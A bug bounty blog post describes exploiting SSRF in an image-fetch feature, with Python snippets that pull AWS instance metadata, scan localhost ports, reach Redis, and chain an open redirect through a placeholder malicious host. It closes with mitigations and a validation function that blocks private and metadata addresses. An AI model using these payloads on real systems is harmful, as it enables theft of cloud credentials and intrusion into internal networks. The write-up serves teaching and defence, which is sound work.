How I Exploited an SSRF Vulnerability & Earned $5000: Real-World Exploit!
Introduction
Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to manipulate server-side requests, often leading to data leaks, internal network access, or even remote code execution. In this article, I'll share how I discovered an SSRF vulnerability, exploited it, and earned a bug bounty reward. Plus, I'll demonstrate a real-world exploit with code!
What is SSRF?
SSRF occurs when an attacker tricks the server into making requests to unintended destinations. These requests can be used to:
- Access internal services (e.g., http://localhost:8080)
- Retrieve metadata from cloud services (e.g., AWS EC2 http://169.254.169.254/latest/meta-data/)
- Scan internal networks for open ports
- Exfiltrate sensitive data
- Exploit open redirect vulnerabilities
How I Found the SSRF Bug
While testing a file upload and URL fetch feature, I noticed that the application allowed users to input external URLs to fetch images. This was a perfect candidate for SSRF exploitation.
Steps I Took:
- Tested fetching an external URL: the server successfully retrieved the image from my provided URL.
- Checked for internal network access: attempted to fetch http://localhost:80 and received a response from the internal server.
- Tested cloud metadata access: requested http://169.254.169.254/latest/meta-data/ and successfully retrieved AWS instance details.
Real-World SSRF Exploit Example
Here's a practical proof-of-concept (PoC) for the SSRF vulnerability:
import requests

# Target URL that fetches images from external sources
url = "https://vulnerable-website.com/fetch?url="

# Attempt to access AWS metadata service
payload = "http://169.254.169.254/latest/meta-data/"
response = requests.get(url + payload)
print("Response:", response.text)
How It Works:
- The vulnerable website accepts a user-supplied URL.
- Instead of providing a normal image URL, we send a request to AWS metadata.
- The server fetches the data and returns sensitive information, including IAM roles, instance ID, and credentials.
Advanced SSRF Exploitation Techniques
1. Port Scanning the Internal Network
If the application allows custom ports, you can scan internal services:
# `requests` and `url` are the ones defined in the PoC above
for port in range(8000, 8100):
    test_url = f"http://localhost:{port}/"
    response = requests.get(url + test_url)
    print(f"Port {port}: {response.status_code}")
2. Accessing Redis, MySQL, or Other Internal Services
Some applications expose databases or internal services that can be accessed via SSRF.
payload = "http://127.0.0.1:6379/" # Targeting Redis
response = requests.get(url + payload)
print("Response:", response.text)
3. Exploiting Open Redirects for Chaining Attacks
If the server follows redirects, we can chain SSRF with Open Redirects:
payload = "https://malicious-site.com/redirect?url=http://169.254.169.254/latest/meta-data/"
response = requests.get(url + payload)
print("Response:", response.text)
How to Prevent SSRF
To mitigate SSRF attacks, developers should:
- Restrict External Requests: only allow whitelisted domains.
- Disable Internal IP Access: block requests to localhost (127.0.0.1) and private IPs (10.x.x.x, 192.168.x.x, etc.).
- Validate User Input: use regular expressions to prevent unwanted URL schemes.
- Use Metadata Proxy Services: prevent direct access to cloud metadata endpoints.
- Monitor and Log Requests: detect unusual internal network access attempts.
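As an added example (not code from the original article), here is a Python check that an image-fetch endpoint could run before making the outbound request. It allows only http/https on standard ports, rejects credentials in the URL, optionally enforces a hostname allowlist, and resolves the hostname so the decision is made on the addresses it actually points to, not on the string alone: the metadata IP, loopback and private ranges listed above are rejected whether they are given as a literal or reached through DNS. The hostnames, addresses and the injectable `resolve` parameter are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

def resolve_all(host):
    """Every address string the name resolves to (A and AAAA); [] if it does not resolve."""
    try:
        return [info[4][0] for info in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []

def is_blocked_ip(ip):
    """Loopback, RFC 1918, link-local (169.254.169.254 included), multicast, reserved, unspecified."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:127.0.0.1 as 127.0.0.1
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def check_fetch_url(url, allowed_hosts=None, resolve=resolve_all):
    """Return (allowed, detail); on success detail is the IP the fetcher should connect to."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"  # userinfo confuses naive host checks
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host not on allowlist: {host}"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP: nothing to resolve
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]  # judge the real targets
    if not addrs:
        return False, f"host does not resolve: {host}"
    blocked = [ip for ip in addrs if is_blocked_ip(ip)]
    if blocked:
        return False, f"{host} resolves to blocked address {blocked[0]}"
    return True, str(addrs[0])
```

Connect to the returned address (sending the original Host header) rather than resolving again, and run the same check on every redirect target before following it, since a server that follows 3xx responses is exactly the chaining case described above.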
The Bug Bounty Reward
After successfully exploiting and reporting the SSRF vulnerability via a private program, the company acknowledged the issue and rewarded me with $5000!
This shows that SSRF vulnerabilities can have serious security implications and lead to big payouts for ethical hackers.
Conclusion
SSRF is a powerful attack vector that can be easily overlooked. If properly exploited, it can lead to internal network access, data leaks, and privilege escalation.
Want to learn more about hacking & cybersecurity? Subscribe to my YouTube channel for exclusive tutorials!
YouTube: youtube.com/@theindiannetwork
Read More on Medium: theindiannetwork.medium.com
Contact Me: theindiannetwork@protonmail.com
Have you ever exploited an SSRF vulnerability? Share your experience in the comments!